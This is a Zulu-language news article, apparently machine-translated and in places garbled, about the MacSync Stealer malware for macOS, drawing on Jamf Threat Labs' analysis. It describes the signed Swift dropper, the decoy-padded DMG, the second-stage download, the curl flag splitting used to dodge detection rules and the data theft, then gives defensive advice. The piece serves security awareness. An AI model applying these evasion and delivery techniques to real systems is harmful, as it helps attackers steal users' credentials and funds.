Isimo semvelo se- Amakhompyutha we-Mac Ibhekane nosongo oluvele ludlala kwelinye iligi: I-MacSync Stealer, i-malware ekhethekile ekwebeni ulwazi olungena kumakhompyutha ukusebenzisa izinhlelo ezithembekile ze-AppleKunokuba yi-virus engeyinhle yesikhathi esidlule, le software enonya iziveza njengohlelo lokusebenza olusemthethweni noluthembekile, olunesiginesha yonjiniyela esebenzayo kanye nenqubo yokuqinisekisa eqinisekisiwe, naseSpain nakwamanye amazwe aseYurophu, njengoba ukuhlaziya kubonisa. ukuhlaselwa kwe-cyber ku-Mac naku-Linux.
Ezinhlotsheni zayo zakamuva, lo mndeni wekhodi enonya Isebenza njengohlelo lokusebenza olubhalwe nge-Swift, olusayinwe futhi oluqinisekiswe yi-AppleLokhu kuyivumela ukuthi idlule eziningi zezindlela zokuphepha zokuqala ze-macOS, kufaka phakathi izindlela ezifana ne-Gatekeeper ne-XProtect. Lokhu kugxuma okubalulekile kwenza ukutholwa kusenesikhathi kube nzima kakhulu futhi kuvula umnyango... ukuvuza buthule kwedatha yomuntu siqu neyenkampani kokubili ezindaweni zasekhaya kanye nezobungcweti.
Kuyini i-MacSync Stealer futhi ithuthuke kanjani ku-macOS?
Ekubonakaleni kwakhe kokuqala, Ukutheleleka kuncike kumasu adinga izenzo ezicacile zomsebenzisiIzindlela ezifana ne-ClickFix noma imiyalo yakudala ethi "copy and paste" ku-Terminal ukuze kusetshenziswe izikripthi ezinonya. Le ndlela yayidinga izinga elikhulu lokuxhumana ngesandla, okunikeza umsebenzisi ithuba elengeziwe lokusola ukuthi kukhona okungahambi kahle futhi amise ukufakwa ngaphambi kokuba umonakalo ube mkhulu kakhulu.
Ukuhlaziya kwe I-Jamf Threat LabsIlebhu yokuphepha yamadivayisi e-Apple ehamba phambili ichaza isimo esihlukile kakhulu kuhlobo lwakamuva. Ngokusho kwemibiko yabo, i-MacSync Stealer inikeze ukuqhubekela phambili kumodeli yokutheleleka ezenzakalelayo kakhulu futhi ethuleukunciphisa izimpawu ezibonakalayo kumuntu ohlukunyeziwe nokuthembela ekuthembekeni okukhiqizwa ukusayina kwe-Apple kanye nokuqinisekiswa kwe-notarization.
Icebo liwukuthi isigaba sokuqala sokuhlasela sivezwa njenge- Uhlelo lokusebenza luthuthukiswe ku-Swift, olune-ID yonjiniyela esemthethweni, isiginesha yekhodi evumelekile, kanye ne-notarization ephumeleleKuhlelo lokusebenza kanye nakubasebenzisi abaningi, le nhlanganisela ifana nesofthiwe ethembekile, kanti empeleni iyisixhumanisi sokuqala ochungechungeni lokutheleleka oluklanywe ngokucophelela.
Ezimweni eziningi, usongo lufika lufihliwe njengo isevisi yokuthumela imiyalezo, ithuluzi lokukhiqiza, noma insiza yokuvumelanisaNjengoba inegama, uphawu, nezincazelo ezizwakala zingenangozi nhlobo, lolu hlobo lwesithombe lunciphisa kakhulu izinsolo zokuqala—imininingwane ekhathazayo kakhulu emahhovisi aseYurophu, ezikhungweni zomphakathi, nasezinkampanini lapho i-Mac isisunguliwe njengethuluzi lomsebenzi wansuku zonke.
Isifaki se-Swift esidlula i-Gatekeeper futhi sisebenze njenge-dropper
Umkhankaso ochazwe yiJamf ukhombisa ukuthi ingxenye yokuqala yosongo isebenza njenge- i-dropper ebhalwe nge-SwiftUmfaki obonakala efanelekile onenhloso yangempela yokulungisa umhlabathi nokulanda ikhodi yangempela enonya kusuka kuseva ekude. Ekuqaleni, i-Mach-O binary equkethwe kulolu hlelo lokusebenza... Kubonakala sengathi kusayinwe futhi kuqinisekisiwe, kuhlotshaniswa ne-ID yeQembu lonjiniyela langempelaNgakho-ke, idlula kalula ukuhlolwa kokuqala kwe-Gatekeeper.
Kwesinye sezimo ezihlaziyiwe, i-dropper yasatshalaliswa njenge- Isithombe sediski se-DMG esinegama lohlelo lokusebenza lokuthumela imiyalezongaphansi kwamagama anjengelithi “zk-call-messenger-installer-3.9.2-lts.dmg” futhi abanjwe kusizinda esilungiselelwe umkhankaso. Umfakisi uziveza kumsebenzisi njengethuluzi lokubiza nelokuthumela imiyalezo, ukuze Chofoza kabili ukuze uyisebenzise, ngaphandle kwezinyathelo eziyinkimbinkimbi zokutheleleka okudala.
Ngisho noma iphakheji isayiniwe, kwezinye izimo abahlaseli bayanezela Imiyalelo yokuphoqa umsebenzisi ukuthi achofoze kwesokudla bese ukhetha okuthi "Vula"Leli icebo elijwayelekile lokugwema izexwayiso ezengeziwe ze-macOS uma uhlelo lokusebenza lungaveli ku-Mac App Store. Le mininingwane emincane, abaningi abayinaki, kufanele iveze izimpawu ezibomvu, ikakhulukazi uma isofthiwe ivela kuwebhusayithi engacacile.
Uma umsebenzisi eqala uhlelo lokusebenza, i-dropper yenza uchungechunge lwe- ukuhlolwa kwemvelo ngaphambi kokudlulela esigabeni sesibiliPhakathi kwezinye izinyathelo, iqinisekisa ukuthi ikhompyutha inokuxhumeka kwe-inthanethi okuzinzile, ihlola izimo ezithile zesistimu, futhi, kwezinye izimo, ilinde isikhathi esincane sokuqalisa esiseduze ne- Imizuzwana engu-3600 ukuze ukuziphatha kwabo kungabonakali kushesha kakhulu noma kusolisa.
Uma izimo ezibekwe abahlaseli zihlangatshezwa, uhlelo luxhuma ku- iseva yomyalo nokulawula okukude ukulanda iskripthi esifakwe ikhodi noma umthwalo wokukhokha, ngokuvamile ku-Base64, equkethe i-MacSync Stealer core. Kulesi sigaba, ikhodi inesibopho ukweba ulwazi nokulawula i-Mac esengozini, kuyilapho umfaki wokuqala ekhawulelwe ekusebenzeni njengehhashi leTrojan.
Amafayela e-DMG akhuphukile, amafayela okukhohlisa, kanye nezinguquko zokulanda ukuze kugwenywe ukutholakala
Esinye sezici eziye zaheha kakhulu abacwaningi ukusetshenziswa kwe izithombe zediski enkulu ezigcwele amafayela okukhohlisaI-DMG ehlobene nalesi sifaki iseduze 25,5 MB, ivolumu ephezulu ngokungavamile yalokho, ngaphandle, okubonakala sengathi uhlelo lokusebenza lokuthumela imiyalezo olulula noma usizo olulula.
Ngokusho kweJamf Threat Labs, lesi sisindo sifinyelelwe ukufutha iphakheji ngamadokhumenti angabalulekile, njenge-PDF noma amanye amafayela afakiwe lokho akunikezi lutho ekusebenzeni kohlelo lokusebenza. Lokho kuhlanganiswa kokuqukethwe kokugcwalisa nengxenye yangempela Lokhu kwenza kube nzima ukuhlaziywa okuzenzakalelayo okwenziwa yi-antivirus kanye nezixazululo zokuphepha.okumele basebenzise idatha eningi futhi bahlukanise okusemthethweni nokungesisemthethweni.
Ngemva kokufaka isithombe sediski nokusebenzisa uhlelo lokusebenza, i-dropper iqala i- ukuskena indawo yendawo ukuhlola konke kusukela ekuxhumekeni kuya kumapharamitha athile esistimu. Kuphela uma kusobala ukuthi isimo siyafaneleka lapho ixhumana nengqalasizinda ekude ukuze ilande imojuli yesibili. Ezimweni eziningi, imithwalo iyasebenza Zisebenza ngokuyinhloko kwimemori, zishiya unyawo oluncane kudiski. futhi kuqhubeke nokuba nzima ukutholwa kwe-forensic okulandelayo.
Ikhodi elandiwe kulesi sigaba sesibili ihambelana ne- I-MacSync, ukuvela komndeni wangaphambilini owaziwa ngokuthi i-Mac.cUphenyo oluzimele lubonisa ukuthi le agent yakhiwe ku-Go futhi inamakhono ahlukahlukene adlula kakhulu ukweba amaphasiwedi, kulandela ukuthambekela kwezinye izinsongo zanamuhla ezibhekiswe ku-macOS.
Ngaphezu kwakho konke, abahlaseli baze balungisa kahle ukulanda imiyalo esetshenziswe kule nquboUkusetshenziswa kwamathuluzi anjenge curl Kwenziwa ngokuhlanganiswa kwamapharamitha okungajwayelekile — isibonelo, ngokuhlukanisa umucu ojwayelekile -fsSL kumafulegi afana -fL y -sSkanye nokufaka izinketho ezifana --noproxy- ngenhloso yoku ukugwema imithetho yokuthola ngokusekelwe kumaphethini aphindaphindwayo futhi kuthuthukiswe ukuthembeka kokuxhumeka kumaseva abo.
Kusukela ekwebeni idatha kuya epulatifomu yokulawula kude
Inhliziyo ye-MacSync Stealer idlula isigaba se-infostealer esiyisisekelo: ukuhlaziywa kobuchwepheshe kuchaza i-ejenti enekhono eligcwele lokulawula nokulawula (C2), ukulungele ukugcina ukuxhumana okuqhubekayo nethimba elithintekile nokuthola imiyalelo yesikhathi sangempela.
Phakathi kwemisebenzi ebalulwe kulo mndeni, okulandelayo kuyagqama: ukwebiwa kweziqinisekiso, ukuphequlula amakhukhi, idatha yamakhadi asebhange kanye cryptocurrency walletskanye nokukhishwa kwazo zonke izinhlobo zamafayela athakazelisayo kubahlaseli. ulwazi olugcinwe ku-macOS Keychain Idatha evela kuziphequluli ezifana ne-Safari, i-Chrome, noma i-Firefox isivele iyisethi ekhangayo kakhulu yezinhloso zemikhankaso yokukhwabanisa ngezezimali kanye nobunhloli bezinkampani.
Elinye iphuzu elibucayi yikhono lokwenza Faka amamojula engeziwe uma kudingekaLe ndlela yokulawula ivumela ithimba elisengozini ukuba libe uhlobo "lommese we-Swiss Army" ononya: namuhla kugxilwe ekuqoqweni kwamaphasiwedi kanye nasekulobeni ama-keystrokes kusasa, ukubethela amafayela, ukuhamba eceleni kunethiwekhi yenkampani noma ukusebenzisa amathuluzi amasha okufinyelela kude.
Kubasebenzisi namabhizinisi eSpain nakwamanye amazwe aseYurophu, lolu shintsho oluvela ekubeni yisela ledatha elilula luye ekubeni yisela ledatha elilula ipulatifomu yokulawula kude eguquguqukayo Lokhu kubonisa ukwenyuka okukhulu ezingeni lengozi. I-Mac ethelelekile ayibe nje umthombo wolwazi olubiwe kanye futhi iba isango eliya kumanethiwekhi ebhizinisi, izinsizakalo zamafu, noma izinhlelo ezibalulekile lapho idivayisi inokufinyelela khona.
Lesi simo sihambisana nomkhuba obanzi obonwa yizinkampani ezahlukene zokuphepha kwe-inthanethi: ukwanda okuqhubekayo kwama-infostealers kanye nama-modular Trojans ahlose i-macOSLokhu kubangelwa ukukhula kwesabelo semakethe semishini ye-Apple kanye nephrofayili yezomnotho yabasebenzisi bayo, okubenza babe yisisulu esikhangayo kakhulu sokukhwabanisa ku-inthanethi.
Impendulo ye-Apple kanye nemikhawulo yokuvikela okuzenzakalelayo ku-macOS
Ngemva kwezixwayiso ezivela ku-Jamf Threat Labs kanye nezinye izinkampani zokuphepha, I-Apple ihoxise izitifiketi zokusayina ikhodi ezihlotshaniswa ne-Team ID esetshenziswa kumkhankaso we-MacSync Stealer.Ngalesi sinyathelo, uhlelo lokusebenza luyeka ukuthemba izinhlelo zokusebenza ezisayinwe naleso sihlonzi futhi luvimbele ukwakheka okusha okuzama ukusisebenzisa ukusabalalisa isofthiwe enonya.
Ngesikhathi esifanayo, inkampani ibuyekeze izindlela zokuvikela zangaphakathi, njenge-XProtect kanye ne-Gatekeeperngemithetho emisha yokuthola kanye nohlu lwama-hashes nama-signature aziwayo. Ezinguqulweni zamanje ze-macOS, lawa ma-blacklist abuyekezwa njalo ngaphandle kokungenelela komsebenzisi, ngakho-ke kubalulekile gcina uhlelo lusesikhathini futhi usebenzise izibuyekezo ezitholakalayo ukuze uzuze kulezo ziqeshana kanye nokuthuthukiswa.
Noma kunjalo, ochwepheshe baphikelela ngokuthi icala le-MacSync Stealer libonisa ukuthambekela okujwayelekile kwe-malware ye-macOS: abahlaseli bazama kakhulu ukwenza kanjalo faka ikhodi yakho kuma-executable asayiniwe futhi aqinisekisiweukuze zibonakale ziyizinhlelo zokusebenza ezisemthethweni nezithembekile ngokuphelele. Uma zifeza lokhu, amathuba okuba umsebenzisi athole izixwayiso ezicacile ancishiswa kakhulu.
Imibiko evela kuJamf nakwezinye izinkampani igcizelela ukuthi ngisho nalapho i-Apple ihoxisa izitifiketi ezibekwe engcupheni, Izigebengu ze-inthanethi zingabhalisa ama-ID onjiniyela abasha bese ziphinda isu elifanayo.ngokushintsha imininingwane emincane ukuze kugwenywe imithetho emisha engeziwe. Lo mdlalo wekati negundane uphoqa ukuzivikela kwe-macOS komdabu ukuthi kufakwe izendlalelo ezengeziwe.
Lo mongo uqinisa umqondo wokuthi Ukuphepha akukwazi ukuthembela kuphela ekuvikelweni okuzenzakalelayoNakuba i-Gatekeeper, i-XProtect, kanye nenqubo yokuqinisekisa i-notarization inyuse kakhulu izinga, ukuhlaselwa okufana ne-MacSync Stealer kubonisa ukuthi izindlela zokuthembela zingasetshenziswa nabasebenzisi lapho othile ekwazi ukufaka uhlelo lwakhe lokusebenza kuchungechunge lokuqinisekisa.
Umthelela kubasebenzisi be-Mac eSpain naseYurophu kanye nemikhuba emihle yokuvikela
Ukwandiswa kwe-Mac ku amahhovisi, amanyuvesi kanye nezindlu eSpain nakwamanye amazwe aseYurophu I-macOS isibe yisisulu esikhangayo kakhulu samaqembu obugebengu. Akuseyona ipulatifomu ekhethekile: izinhlangano eziningi zihlanganisa i-macOS engqalasizinda yazo, okwenza izinsongo ezifana ne-MacSync Stealer zibe yinkinga enkulu esifundeni.
Ochwepheshe batusa ukuqinisa amakhono obuchwepheshe kanye nemikhuba yansuku zonke. Isinyathelo sokuqala, esibonakala silula kodwa siyisisekelo, yilesi Gcina i-macOS nezinhlelo zokusebenza zisesikhathini futhi enze izipele ezivamileNgenxa yokuthi i-Apple ivame ukwethula izisayini ezintsha kanye nemithetho yokuvimba yalezi zinhlobo zezinsongo, ukunganaki izibuyekezo zokuphepha kushiya umnyango uvulekele izinhlobo esezivele zibhaliwe futhi zilungisiwe.
Kuphinde kugcizelelwe ukubaluleka kwe khawulela ukufakwa kwesofthiwe ku-Mac App Store noma onjiniyela abaziwayoNgisho noma umfakisi ebonakala esayiniwe futhi eqinisekisiwe, lelo lebula aliseyona isiqinisekiso esiphelele sokuphepha, njengoba lokhu kubonisa. Ukulanda izinhlelo zokusebenza kusuka kuzixhumanisi ezitholwe nge-imeyili, imiyalezo, noma amawebhusayithi angathembekile kwandisa kakhulu ingozi yokutheleleka.
Esinye isici esibalulekile Naka izimvume ezicelwa yisicelo ngasinye.Ukufinyelela ku-keychain, amadokhumenti abasebenzisi, umlando wesiphequluli, noma izici zokufinyeleleka kuyimvume okufanele inikezwe kancane, ikakhulukazi lapho kukhulunywa ngezinsiza zamahhala ezivela emvelaphi engabazisayo. Izifo eziningi eziphumelelayo zithembele ngqo kulokhu. izimvume eziningi kakhulu ezamukelwe ngumsebenzisi ngokwakhe ngaphandle kokubuyekeza.
Ezindaweni zobungcweti, ikakhulukazi ngaphakathi kwe-European Union, kuyalulekwa ukwengeza ukuzivikela kwe-Apple nge izixazululo zokuphepha ze-macOS ngqoAmathuluzi e-EDR kanye nezinqubomgomo ezicacile zokulanda isofthiwe kanye nokufaka kubalulekile. Lezi zinyathelo zibaluleke kakhulu ezinkampanini ezingaphansi kwemithethonqubo yokuvikela idatha, lapho isigameko sokwebiwa kweziqinisekiso noma ukukhishwa kolwazi kungaholela ezijezisweni nasekulahlekelweni kokuthenjwa.
Konke okuzungeze i-MacSync Stealer kubonisa izinga I-malware ye-Mac ayisatholakali kalulaAbahlaseli bathembele kuma-executable asayiniwe nanotarized, bafaka izithombe zediski ngamafayela okususa amaphutha, balande imithwalo yesigaba sesibili kusuka kumaseva akude, futhi bathumele ama-ejenti akwazi ukweba idatha nokugcina ukulawula okukude kumakhompyutha. Kulesi simo, umqondo omdala wokuthi "ama-Mac awanawo amagciwane" usuphelelwe yisikhathi, futhi ukuvikela manje kuhilela ukuhlanganisa izivikelo zomdabu ze-Apple kanye imikhuba emihle yokusebenzisa kanye nokuqapha njalo ukuvimbela ikhompyutha yethu ekubeni yisixhumanisi esibuthakathaka kakhulu kulolu chungechunge.